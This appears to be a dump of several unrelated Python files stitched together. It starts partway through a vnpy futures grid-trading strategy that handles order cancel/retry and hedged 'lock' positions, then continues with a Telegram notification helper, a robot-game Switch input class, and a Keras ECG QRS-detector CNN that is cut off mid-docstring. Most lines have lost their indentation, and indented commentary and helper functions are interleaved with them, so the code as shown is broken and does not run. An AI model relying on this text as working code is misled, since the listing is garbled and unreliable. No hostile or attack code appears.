u'网格volume:{},order_volume:{}不一致,修正'.format(order_grid.volume, order_volume))
order_grid.volume = order_volume
self.write_log(u'重新提交{}开空委托,开空价{},v:{}'.format(order_vt_symbol, short_price, order_volume))
vt_orderids = self.short(price=short_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderid:{}'.format(vt_orderids))
order_grid.snapshot.update({'open_price': short_price})
else:
self.write_error(u'撤单后,重新委托开空仓失败')
else:
buy_price = self.cur_mi_price + self.price_tick
if order_grid.volume != order_volume and order_volume > 0:
self.write_log(
u'网格volume:{},order_volume:{}不一致,修正'.format(order_grid.volume, order_volume))
order_grid.volume = order_volume
self.write_log(u'重新提交{}开多委托,开多价{},v:{}'.format(order_vt_symbol, buy_price, order_volume))
vt_orderids = self.buy(price=buy_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
order_grid.snapshot.update({'open_price': buy_price})
else:
self.write_error(u'撤单后,重新委托开多仓失败')
else:
# 属于平多委托单
if order_info['direction'] == Direction.SHORT:
sell_price = self.cur_mi_price - self.price_tick
self.write_log(u'重新提交{}平多委托,{},v:{}'.format(order_vt_symbol, sell_price, order_volume))
vt_orderids = self.sell(price=sell_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
else:
self.write_error(u'撤单后,重新委托平多仓失败')
# 属于平空委托单
else:
cover_price = self.cur_mi_price + self.price_tick
self.write_log(u'重新提交{}平空委托,委托价{},v:{}'.format(order_vt_symbol, cover_price, order_volume))
vt_orderids = self.cover(price=cover_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
else:
self.write_error(u'撤单后,重新委托平空仓失败')
else:
self.write_log(u'撤单逻辑 => 无须重新开仓')
if order_info['offset'] == Offset.OPEN \
and order_grid \
and len(order_grid.order_ids) == 0:
if order_info['traded'] == 0 and order_grid.traded_volume == 0:
self.write_log(u'撤单逻辑 => 无任何成交 => 移除委托网格{}'.format(order_grid.__dict__))
order_info['grid'] = None
self.gt.remove_grids_by_ids(direction=order_grid.direction, ids=[order_grid.id])
elif order_info['traded'] > 0:
self.write_log('撤单逻辑 = > 部分开仓')
if order_grid.traded_volume < order_info['traded']:
self.write_log('撤单逻辑 = > 调整网格开仓数 {} => {}'.format(order_grid.traded_volume, order_info['traded'] ))
order_grid.traded_volume = order_info['traded']
self.write_log(f'撤单逻辑 => 调整网格委托状态=> False, 开仓状态:True, 开仓数量:{order_grid.volume}=>{order_grid.traded_volume}')
order_grid.order_status = False
order_grid.open_status = True
order_grid.volume = order_grid.traded_volume
order_grid.traded_volume = 0
# 删除撤单的订单
for vt_orderid in canceled_ids:
self.write_log(u'撤单逻辑 => 删除未完成订单:{}'.format(vt_orderid))
self.active_orders.pop(vt_orderid, None)
if len(self.active_orders) == 0:
self.entrust = 0
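    # Note on the cancel/retry flow: the FAK branches in the callbacks above re-price a
    # cancelled order one tick more aggressively and resubmit it, tracking a per-order
    # 'retry' counter (capped at 20 for close orders). Plain limit orders are handled here
    # in tns_cancel_logic, which cancels them once they have been pending longer than
    # cancel_seconds and, when reopen=True, re-submits the open/close at the current price.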
def tns_close_long_pos(self, grid):
"""
        Transactionally close a long position.
        1. Triggered by stop-loss / take-profit exits.
        Logic: if yesterday's position in the account covers the close volume, close it directly;
        otherwise create a lock (hedge) grid.
        :param grid: grid to be closed
:return:
"""
self.write_log(u'执行事务平多仓位:{}'.format(grid.to_json()))
# 平仓网格得合约
sell_symbol = grid.snapshot.get('mi_symbol', self.vt_symbol)
# 从cta engine获取当前账号中,sell_symbol的持仓情况
grid_pos = self.cta_engine.get_position_holding(vt_symbol=sell_symbol)
if grid_pos is None:
self.write_error(u'无法获取{}得持仓信息'.format(sell_symbol))
return False
# 不需要日内锁仓,或者昨仓可以满足,发出委托卖出单
if (grid_pos.long_yd >= grid.volume > 0 and grid_pos.long_td == 0 and grid_pos.short_td == 0) \
or not self.activate_today_lock:
if self.activate_today_lock:
self.write_log(u'昨仓多单:{},没有今仓,满足条件,直接平昨仓'.format(grid_pos.long_yd))
sell_price = self.cta_engine.get_price(sell_symbol)
if sell_price is None:
self.write_error(f'暂时不能获取{sell_symbol}价格,不能平仓')
return False
# 实盘使用对价
if not self.backtesting:
sell_tick = self.cta_engine.get_tick(sell_symbol)
if sell_tick and 0 < sell_tick.bid_price_1 < sell_price:
sell_price = sell_tick.bid_price_1
# 发出平多委托
if grid.traded_volume > 0:
grid.volume -= grid.traded_volume
grid.traded_volume = 0
# 非股指,才需要检查现有仓位
            if self.exchange != Exchange.CFFEX and grid_pos.long_pos < grid.volume:
self.write_error(f'账号{sell_symbol}多单持仓:{grid_pos.long_pos}不满足平仓:{grid.volume}要求:')
return False
vt_orderids = self.sell(price=sell_price,
volume=grid.volume,
vt_symbol=sell_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
lock=self.exchange==Exchange.CFFEX,
grid=grid)
if len(vt_orderids) == 0:
self.write_error(u'多单平仓委托失败')
return False
else:
self.write_log(u'多单平仓委托成功,编号:{}'.format(vt_orderids))
return True
# 当前没有昨仓,采用锁仓处理
else:
self.write_log(u'昨仓多单:{}不满足条件,创建对锁仓'.format(grid_pos.long_yd))
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = sell_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = grid.volume
dist_record['operation'] = 'add short lock[long]'
self.save_dist(dist_record)
# 创建一个对锁网格
lock_grid = copy(grid)
# 网格类型, => 锁仓格
lock_grid.type = LOCK_GRID
lock_grid.id = str(uuid.uuid1())
lock_grid.direction = Direction.SHORT
lock_grid.open_status = False
lock_grid.order_status = False
lock_grid.order_ids = []
vt_orderids = self.short(self.cur_mi_price,
volume=lock_grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
grid=lock_grid)
if len(vt_orderids) > 0:
# 原做多网格得类型,设置为锁仓格
grid.type = LOCK_GRID
self.write_log(u'委托创建对锁单(空单)成功,委托编号:{},{},p:{},v:{}'
.format(vt_orderids,
sell_symbol,
self.cur_mi_price,
lock_grid.volume))
lock_grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.up_grids.append(lock_grid)
return True
else:
self.write_error(u'未能委托对锁单(空单)')
return False
def tns_close_short_pos(self, grid):
"""
        Transactionally close a short position.
        1. Triggered by stop-loss / take-profit exits.
        2. Triggered by contract rollover.
        Logic: if yesterday's position in the account covers the close volume, close it directly;
        otherwise create a lock (hedge) grid.
        :param grid: grid to be closed
:return:
"""
self.write_log(u'执行事务平空仓位:{}'.format(grid.to_json()))
# 平仓网格得合约
cover_symbol = grid.snapshot.get('mi_symbol', self.vt_symbol)
# vt_symbol => holding position
grid_pos = self.cta_engine.get_position_holding(cover_symbol)
if grid_pos is None:
self.write_error(u'无法获取{}得持仓信息'.format(cover_symbol))
return False
# 昨仓可以满足,发出委托卖出单
if (grid_pos.short_yd >= grid.volume > 0 and grid_pos.long_td == 0 and grid_pos.short_td == 0) \
or not self.activate_today_lock:
if self.activate_today_lock:
self.write_log(u'昨仓空单:{},没有今仓, 满足条件,直接平昨仓'.format(grid_pos.short_yd))
cover_price = self.cta_engine.get_price(cover_symbol)
if cover_price is None:
self.write_error(f'暂时没有{cover_symbol}行情,不能执行平仓')
return False
# 实盘使用对价
if not self.backtesting:
cover_tick = self.cta_engine.get_tick(cover_symbol)
if cover_tick and 0 < cover_price < cover_tick.ask_price_1 :
cover_price = cover_tick.ask_price_1
# 发出cover委托
if grid.traded_volume > 0:
grid.volume -= grid.traded_volume
grid.traded_volume = 0
# 非股指,需要检查是否有持仓
            if self.exchange != Exchange.CFFEX and grid_pos.short_pos < grid.volume:
self.write_error(f'账号{cover_symbol}空单持仓:{grid_pos.short_pos}不满足平仓:{grid.volume}要求:')
return False
vt_orderids = self.cover(price=cover_price,
volume=grid.volume,
vt_symbol=cover_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
lock=self.exchange==Exchange.CFFEX,
grid=grid)
if len(vt_orderids) == 0:
self.write_error(u'空单平仓委托失败')
return False
else:
self.write_log(u'空单平仓委托成功,编号:{}'.format(vt_orderids))
return True
# 当前没有昨仓,采用锁仓处理
else:
self.write_log(u'昨仓空单:{}不满足条件,建立对锁仓'.format(grid_pos.short_yd))
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = cover_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = grid.volume
dist_record['operation'] = 'add long lock[short]'
self.save_dist(dist_record)
# 创建一个对锁网格
lock_grid = copy(grid)
# 网格类型, => 锁仓格
lock_grid.type = LOCK_GRID
lock_grid.id = str(uuid.uuid1())
lock_grid.direction = Direction.LONG
lock_grid.open_status = False
lock_grid.order_status = False
lock_grid.order_ids = []
vt_orderids = self.buy(price=self.cur_mi_price,
volume=lock_grid.volume,
vt_symbol=cover_symbol,
order_type=self.order_type,
grid=lock_grid)
if len(vt_orderids) > 0:
# 原做空网格得类型,设置为锁仓格
grid.type = LOCK_GRID
self.write_log(u'委托创建对锁单(多单)成功,委托编号:{},{},p:{},v:{}'
.format(vt_orderids,
self.vt_symbol,
self.cur_mi_price,
lock_grid.volume))
lock_grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.dn_grids.append(lock_grid)
return True
else:
self.write_error(u'未能委托对锁单(多单)')
return False
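    # Background for the two close methods above and tns_open_from_lock below: when the
    # account has no usable "yesterday" position (or activate_today_lock requires it), the
    # strategy hedges instead of closing outright -- it opens an opposite LOCK_GRID of the
    # same volume (commonly to avoid close-today restrictions/costs), and the pair is
    # unwound later by tns_open_from_lock / tns_close_locked_grids once both sides hold
    # yesterday positions and no today positions.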
def tns_open_from_lock(self, open_symbol, open_volume, grid_type, open_direction):
"""
        Recover an already-open grid from the lock (hedge) grids; the opposite leg is kept as a stop-loss exit.
        1. Check whether the long and short lock grids hold enough yesterday position.
        2. Locate (or assemble) a grid matching the requested volume.
        :param open_symbol: contract to open (dominant contract)
        :param open_volume: volume to open
        :param grid_type: grid type assigned to the updated grid
        :param open_direction: direction to open
        :return: None on failure, otherwise the grid that is kept
"""
# 检查多单得对锁格
locked_long_grids = self.gt.get_opened_grids_within_types(direction=Direction.LONG, types=[LOCK_GRID])
if len(locked_long_grids) == 0:
return None
locked_long_dict = {}
for g in locked_long_grids:
symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不纳入计算'.format(g.to_json()))
continue
if symbol != open_symbol:
self.write_log(u'不处理symbol不一致: 委托请求:{}, Grid mi Symbol:{}'.format(open_symbol, symbol))
continue
volume = g.volume - g.traded_volume
locked_long_dict.update({symbol: locked_long_dict.get(symbol, 0) + volume})
locked_long_volume = locked_long_dict.get(open_symbol, 0)
if locked_long_volume < open_volume:
self.write_log(u'锁单中,没有足够得多单:{},需求:{}'.format(locked_long_volume, open_volume))
return None
# 空单对锁格
locked_short_grids = self.gt.get_opened_grids_within_types(direction=Direction.SHORT, types=[LOCK_GRID])
if len(locked_short_grids) == 0:
return None
locked_short_dict = {}
for g in locked_short_grids:
symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
continue
if symbol != open_symbol:
self.write_log(u'不处理symbol不一致: 委托请求:{}, Grid mi Symbol:{}'.format(open_symbol, symbol))
continue
volume = g.volume - g.traded_volume
locked_short_dict.update({symbol: locked_short_dict.get(symbol, 0) + volume})
locked_short_volume = locked_short_dict.get(open_symbol, 0)
if locked_short_volume < open_volume:
self.write_log(u'锁单中,没有足够得空单:{},需求:{}'.format(locked_short_volume, open_volume))
return None
# 检查空单昨仓是否满足
symbol_pos = self.cta_engine.get_position_holding(open_symbol)
if (open_direction == Direction.LONG and symbol_pos.short_yd < open_volume) \
or (open_direction == Direction.SHORT and symbol_pos.long_yd < open_volume):
self.write_log(u'昨仓数量,多单:{},空单:{},不满足:{}'
.format(symbol_pos.long_yd, symbol_pos.short_yd, open_volume))
return None
# 合并/抽离出 满足open_volume得多格,
target_long_grid = None
remove_long_grid_ids = []
for g in sorted(locked_long_grids, key=lambda grid: grid.volume):
if g.order_status or len(g.order_ids) > 0:
continue
if target_long_grid is None:
target_long_grid = g
if g.volume == open_volume:
self.write_log(u'第一个网格持仓数量一致:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
break
elif g.volume > open_volume:
self.write_log(u'第一个网格持仓数量大于需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
remain_grid = copy(g)
g.volume = open_volume
remain_grid.volume -= open_volume
remain_grid.id = str(uuid.uuid1())
self.gt.dn_grids.append(remain_grid)
self.write_log(u'添加剩余仓位到新多单网格:g.volume:{}'
.format(remain_grid.volume))
break
else:
if g.volume <= open_volume - target_long_grid.volume:
self.write_log(u'网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
target_long_grid.volume += g.volume
g.volume = 0
self.write_log(u'计划移除:{}'.format(g.id))
remove_long_grid_ids.append(g.id)
else:
self.write_log(u'转移前网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
g.volume -= (open_volume - target_long_grid.volume)
target_long_grid.volume = open_volume
self.write_log(u'转移后网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
break
target_short_grid = None
remove_short_grid_ids = []
for g in sorted(locked_short_grids, key=lambda grid: grid.volume):
if g.order_status or g.order_ids:
continue
if target_short_grid is None:
target_short_grid = g
if g.volume == open_volume:
self.write_log(u'第一个空单网格持仓数量满足需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
break
elif g.volume > open_volume:
self.write_log(u'第一个空单网格持仓数量大于需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
remain_grid = copy(g)
g.volume = open_volume
remain_grid.volume -= open_volume
remain_grid.id = str(uuid.uuid1())
self.gt.up_grids.append(remain_grid)
self.write_log(u'添加剩余仓位到新空单网格:g.volume:{}'
.format(remain_grid.volume))
break
else:
if g.volume <= open_volume - target_short_grid.volume:
target_short_grid.volume += g.volume
g.volume = 0
remove_short_grid_ids.append(g.id)
else:
self.write_log(u'转移前空单网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_short_grid.volume))
g.volume -= (open_volume - target_short_grid.volume)
target_short_grid.volume = open_volume
self.write_log(u'转移后空单网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_short_grid.volume))
break
        if target_long_grid is None or target_short_grid is None:
self.write_log(u'未能定位多单网格和空单网格,不能解锁')
return None
# 移除volume为0的网格
self.gt.remove_grids_by_ids(direction=Direction.LONG, ids=remove_long_grid_ids)
self.gt.remove_grids_by_ids(direction=Direction.SHORT, ids=remove_short_grid_ids)
if open_direction == Direction.LONG:
self.write_log(u'保留多单,对空单:{}平仓'.format(target_short_grid.id))
# 对空单目标网格进行平仓
cover_price = self.cta_engine.get_price(open_symbol)
# 使用止损价作为平仓
self.write_log(u'空单止损价 :{} =>{}'.format(target_short_grid.stop_price, cover_price - 10 * self.price_tick))
target_short_grid.stop_price = cover_price - 10 * self.price_tick
# 更新对锁格类型=>指定类型
self.write_log(u'空单类型 :{} =>{}'.format(target_short_grid.type, grid_type))
target_short_grid.type = grid_type
# 返回保留的多单网格
return target_long_grid
else:
self.write_log(u'保留空单,对多单平仓')
sell_price = self.cta_engine.get_price(open_symbol)
            # 使用止损价作为平仓
            self.write_log(u'多单止损价 :{} =>{}'.format(target_long_grid.stop_price, sell_price + 10 * self.price_tick))
target_long_grid.stop_price = sell_price + 10 * self.price_tick
# 更新对锁格类型=>指定类型
            self.write_log(u'多单类型 :{} =>{}'.format(target_long_grid.type, grid_type))
target_long_grid.type = grid_type
# 返回保留的空单网格
return target_short_grid
def tns_close_locked_grids(self, grid_type):
"""
        Transactionally close out all lock (hedge) grid pairs.
:return:
"""
# 正在委托时,不处理
if self.entrust != 0:
return
if not self.activate_today_lock:
return
# 多单得对锁格
locked_long_grids = self.gt.get_opened_grids_within_types(direction=Direction.LONG, types=[LOCK_GRID])
if len(locked_long_grids) == 0:
return
locked_long_dict = {}
for g in locked_long_grids:
vt_symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
volume = g.volume - g.traded_volume
locked_long_dict.update({vt_symbol: locked_long_dict.get(vt_symbol, 0) + volume})
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
return
locked_long_volume = sum(locked_long_dict.values(), 0)
# 空单对锁格
locked_short_grids = self.gt.get_opened_grids_within_types(direction=Direction.SHORT, types=[LOCK_GRID])
if len(locked_short_grids) == 0:
return
locked_short_dict = {}
for g in locked_short_grids:
vt_symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
volume = g.volume - g.traded_volume
locked_short_dict.update({vt_symbol: locked_short_dict.get(vt_symbol, 0) + volume})
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
return
locked_short_volume = sum(locked_short_dict.values(), 0)
# debug info
self.write_log(u'多单对锁格:{}'.format([g.to_json() for g in locked_long_grids]))
self.write_log(u'空单对锁格:{}'.format([g.to_json() for g in locked_short_grids]))
if locked_long_volume != locked_short_volume:
self.write_error(u'{}对锁格多空数量不一致,不能解锁.\n多:{},\n空:{}'
.format(self.strategy_name, locked_long_volume, locked_short_volume))
return
# 检查所有品种得昨仓是否满足数量
for vt_symbol, volume in locked_long_dict.items():
pos = self.cta_engine.get_position_holding(vt_symbol, None)
if pos is None:
                self.write_error(u'{} 没有获取{}的持仓信息,不能解锁'.format(self.strategy_name, vt_symbol))
return
# 检查多空单得昨单能否满足
if pos.long_yd < volume or pos.short_yd < volume:
self.write_error(u'{}持仓昨仓多单:{},空单:{},不满足解锁数量:{}'
                                 .format(vt_symbol, pos.long_yd, pos.short_yd, volume))
return
if pos.long_td > 0 or pos.short_td > 0:
self.write_log(u'{}存在今多仓:{},空仓{},不满足解锁条件'.format(vt_symbol, pos.long_td, pos.short_td))
return
price = self.cta_engine.get_price(vt_symbol)
if price is None:
                self.write_error(u'{}价格不在tick_dict缓存中,不能解锁'.format(vt_symbol))
                return
# 所有合约价格和仓位都满足同时解开
for g in locked_long_grids:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.vt_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = g.volume
dist_record['operation'] = 'close lock[long]'
self.save_dist(dist_record)
# 通过切换回普通网格,提升止损价的方式实现平仓
self.write_log(
u'网格 从锁仓 {}=>{},提升止损价{}=>{}进行离场'.format(LOCK_GRID, grid_type, g.stop_price,
self.cur_99_price / 2))
g.type = grid_type
g.stop_price = self.cur_99_price / 2
for g in locked_short_grids:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.vt_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = g.volume
dist_record['operation'] = 'close lock[short]'
self.save_dist(dist_record)
# 通过切换回普通网格,提升止损价的方式实现平仓
self.write_log(u'网格 从锁仓 {}=>{},提升止损价{}=>{}进行离场'.format(LOCK_GRID, grid_type, g.stop_price,
self.cur_99_price * 2))
g.type = grid_type
g.stop_price = self.cur_99_price * 2
def grid_check_stop(self):
"""
        Per-grid stop-loss / take-profit check (based on the index price).
:return:
"""
if self.entrust != 0:
return
if not self.trading:
if not self.backtesting:
self.write_error(u'当前不允许交易')
return
# 多单网格逐一止损/止盈检查:
long_grids = self.gt.get_opened_grids_without_types(direction=Direction.LONG, types=[LOCK_GRID])
for g in long_grids:
# 满足离场条件,或者碰到止损价格
if g.stop_price > 0 and g.stop_price > self.cur_99_price \
and g.open_status and not g.order_status:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.idx_symbol
dist_record['volume'] = g.volume
dist_record['price'] = self.cur_99_price
dist_record['operation'] = 'stop leave'
dist_record['signals'] = '{}<{}'.format(self.cur_99_price, g.stop_price)
# 止损离场
self.write_log(u'{} 指数价:{} 触发多单止损线{},{}当前价:{}。指数开仓价:{},主力开仓价:{},v:{}'.
format(self.cur_datetime, self.cur_99_price, g.stop_price, self.vt_symbol,
self.cur_mi_price,
g.open_price, g.snapshot.get('open_price'), g.volume))
self.save_dist(dist_record)
if self.tns_close_long_pos(g):
self.write_log(u'多单止盈/止损委托成功')
else:
self.write_error(u'多单止损委托失败')
# 空单网格止损检查
short_grids = self.gt.get_opened_grids_without_types(direction=Direction.SHORT, types=[LOCK_GRID])
for g in short_grids:
if g.stop_price > 0 and g.stop_price < self.cur_99_price \
and g.open_status and not g.order_status:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.idx_symbol
dist_record['volume'] = g.volume
dist_record['price'] = self.cur_99_price
dist_record['operation'] = 'stop leave'
                dist_record['signals'] = '{}>{}'.format(self.cur_99_price, g.stop_price)
# 网格止损
self.write_log(u'{} 指数价:{} 触发空单止损线:{},{}最新价:{}。指数开仓价:{},主力开仓价:{},v:{}'.
format(self.cur_datetime, self.cur_99_price, g.stop_price, self.vt_symbol,
self.cur_mi_price,
g.open_price, g.snapshot.get('open_price'), g.volume))
self.save_dist(dist_record)
if self.tns_close_short_pos(g):
self.write_log(u'空单止盈/止损委托成功')
else:
self.write_error(u'委托空单平仓失败')
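# Illustration (hypothetical helper, not part of the vnpy API): the FAK re-quote rule used
# in the cancel callbacks above, distilled into a standalone function -- cross the spread by
# one price tick, but never beyond the exchange limit-up price.
def _fak_requote_cover_price(ask_price_1, last_price, old_price, price_tick, limit_up=0):
    price = max(ask_price_1, last_price, old_price) + price_tick
    if limit_up > 0 and price > limit_up:
        price = limit_up
    return price
# e.g. ask 3501, last 3500, old order 3499, tick 1, limit-up 3550 -> re-quote at 3502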
# === UtorYeung/vnpy :: vnpy/app/cta_strategy_pro/template.py (MIT, Python, 107,524 bytes) ===
#!/usr/bin/python
import pathlib
import requests
import smtplib
import logging
import coloredlogs
import verboselogs
from etc.api.keys import *
path_atual_tl = str(pathlib.Path(__file__).parent.absolute())
path_tl_final = path_atual_tl.replace('/etc/notification','')
def logando_notification(tipo, mensagem):
"""
Generates the log message/Gera a mensagem de log.
:param tipo: Sets the log type/Seta o tipo de log.
:param mensagem: Sets the message of log/Seta a mensagem do log.
:return: Returns the complete log's body/Retorna o corpo completo do log.
"""
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG')
coloredlogs.install(level='DEBUG', logger=logger)
logging.basicConfig(format='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s')
logger = verboselogs.VerboseLogger('')
if tipo == 'verbose':
logger.verbose(mensagem)
elif tipo == 'debug':
logger.debug(mensagem)
elif tipo == 'info':
logger.info(mensagem)
elif tipo == 'warning':
logger.warning(mensagem)
elif tipo == 'error':
logger.error(mensagem)
elif tipo == 'critical':
logger.critical(mensagem)
else:
pass
def notificar_telegram(status_nosafe=False, data_nosafe=None):
"""
Generates the notification to Telegram account/Gera a notificação para a conta do Telegram.
"""
usuarios = []
with open(f'{path_tl_final}/etc/notification/users.txt', 'r') as lista:
separar = lista.readlines()
if status_nosafe:
mensagem = str(data_nosafe)
else:
with open(f'{path_tl_final}/etc/notification/message.txt', 'r') as mensagem_corpo:
mensagem = str(mensagem_corpo.read())
for i in separar:
i = i.strip('\r')
i = i.strip('\n')
i = i.split(';')
usuarios += i
for i in usuarios:
if i == '' or i == ' ':
usuarios.remove(i)
for mandar in usuarios:
token = telegram_bot
chat_id = mandar
texto = mensagem
#url_req = f'https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={texto}'
send_message(chat_id=mandar, text=mensagem, token=telegram_bot)
#results = requests.get(url_req)
def send_message(chat_id, text=None, parse_mode='Markdown', token=None):
"""
Sends message in bold mode/Enviar mensagem em negrito.
    :param chat_id: ID of Telegram account/ID da conta Telegram.
:param text: Message/Mensagem.
:param parse_mode: Ignore.
:param token: ID Telegram bot/ID do bot Telegram.
"""
URL = f'https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={text}'
answer = {'chat_id': chat_id, 'text': text, 'parse_mode': 'Markdown'}
r = requests.post(URL, json=answer)
if (text == '/bold'):
send_message(chat_id, 'Here comes the'+'*'+'bold'+'*'+'text!')
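# Minimal usage sketch (illustrative only; the chat id below is a placeholder and
# `telegram_bot` is the token imported from etc/api/keys.py):
#
#   send_message(chat_id='123456789', text='Oblivion: scan finished', token=telegram_bot)
#
# notificar_telegram() sends the same message to every chat id listed in users.txt,
# using message.txt as the body unless status_nosafe/data_nosafe are provided.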
# === 4jinetes/Oblivion :: Linux/etc/notification/telegram.py (BSD-3-Clause, Python, 2,948 bytes) ===
import logging
from abc import abstractmethod
from .input import Input
from .input_config import assert_keycode_list
class Switch(Input):
"""Switch input class
Implement custom on() and off() logic
Read more about defaults from input_config.py
"""
def validate_defaults(self, defaults):
super().validate_defaults(defaults)
assert defaults.keys() <= {
"humanReadableName",
"onScreenPosition",
"keys",
}, "there were extra items in defaults"
assert "keys" in defaults
assert_keycode_list(defaults["keys"])
async def _on_input(self, command, seat):
"""Switch input functionality
Calls on and off depending on command state
:param command: Command from game engine
:type command: dict
:param seat: Robot seat
:type seat: int
"""
if "state" not in command:
logging.warning("Switch: invalid command received")
return
try:
val = str(command["state"])
except (ValueError, TypeError):
            logging.warning(
f"Switch: could not convert {command['state']} into String"
)
return
if val != "up" and val != "down":
logging.warn("Switch: command not <up|down>")
return
if val == "up":
await self.off(seat)
else:
await self.on(seat)
@abstractmethod
async def on(self, seat):
"""Switch turned on functionality
:param seat: Robot seat
:type seat: int
"""
pass
@abstractmethod
async def off(self, seat):
"""Switch turned off functionality
:param seat: Robot seat
:type seat: int
"""
pass
async def reset(self, seat):
"""Switch reset functionality
Defaults to calling off()
:param seat: Robot seat
:type seat: int
"""
await self.off(seat)
def get_name(self):
"""Returns the name of the input
:return: name of the input
:rtype: str
"""
return "button"
def _get_default_keybinds(self):
binds = self.get_default_keybinds()
if not isinstance(binds, list):
binds = [binds]
def enum_to_str(item):
if type(item) is not str:
return item.value
return item
binds = list(map(enum_to_str, binds))
return {"keys": binds}
def get_default_keybinds(self):
"""Returns a single keybind or a list of keybinds.
Switches are bound to the space key by default.
To override the defaults, override this method in your switch
subclass and return different keybinds.
"""
return []
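# A minimal example subclass (hypothetical, for illustration): a switch that only logs its
# state changes. Real games would drive GPIO pins, relays, motors, etc. in on()/off().
class LoggingSwitch(Switch):
    async def on(self, seat):
        logging.info("seat %s: switch on", seat)

    async def off(self, seat):
        logging.info("seat %s: switch off", seat)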
# === SurrogateInc/surrortg-sdk :: surrortg/inputs/switch.py (MIT, Python, 2,834 bytes) ===
#!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
@ide: PyCharm
@author: Pedro Silva
@contact: [email protected]
@created: out-10 of 2019
"""
import os
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as kback
from tensorflow import keras
class QRSNet(object):
@classmethod
def _cnn_net(cls):
"""
Create the CNN net topology.
:return keras.Sequential(): CNN topology.
"""
qrs_detector = keras.Sequential()
# CONV1
qrs_detector.add(keras.layers.Conv1D(96, 49, activation=tf.nn.relu, input_shape=(300, 1), strides=1, name='conv1'))
# POOLING 1
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool1'))
# CONV2
qrs_detector.add(keras.layers.Conv1D(128, 25, activation=tf.nn.relu, strides=1, name='conv2'))
# POOLING 2
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool2'))
# CONV3
qrs_detector.add(keras.layers.Conv1D(256, 9, activation=tf.nn.relu, strides=1, name='conv3'))
# POOLING 3
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool3'))
# CONV4
qrs_detector.add(keras.layers.Conv1D(512, 9, activation=tf.nn.relu, strides=1, name='conv4'))
# POOLING 4
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool4'))
qrs_detector.add(keras.layers.Flatten(data_format=None, name='flatten'))
# FC1
qrs_detector.add(keras.layers.Dense(units=4096, activation=tf.nn.relu, name='fc1'))
# FC2
qrs_detector.add(keras.layers.Dense(units=4096, activation=tf.nn.relu, name='fc2'))
# DROP1
qrs_detector.add(keras.layers.Dropout(rate=0.5, name='drop1'))
# Classes
qrs_detector.add(keras.layers.Dense(units=2, name='classes'))
# SoftMax
qrs_detector.add(keras.layers.Activation(activation=tf.nn.softmax, name='softmax'))
return qrs_detector
@classmethod
def build(cls, net_type):
"""
Build the CNN topology.
:param str net_type: the network type, CNN or LSTM.
:return keras.Sequential(): CNN topology.
"""
if net_type == 'cnn':
qrs_detector = cls._cnn_net()
else:
raise NotImplementedError('Only the CNN network was implemented.')
return qrs_detector
@classmethod
def _prepare_data(cls, data_x, input_shape, data_y, number_of_classes, normalize):
"""
Prepare the data for the training, turning it into a numpy array.
:param list data_x: data that will be used to train.
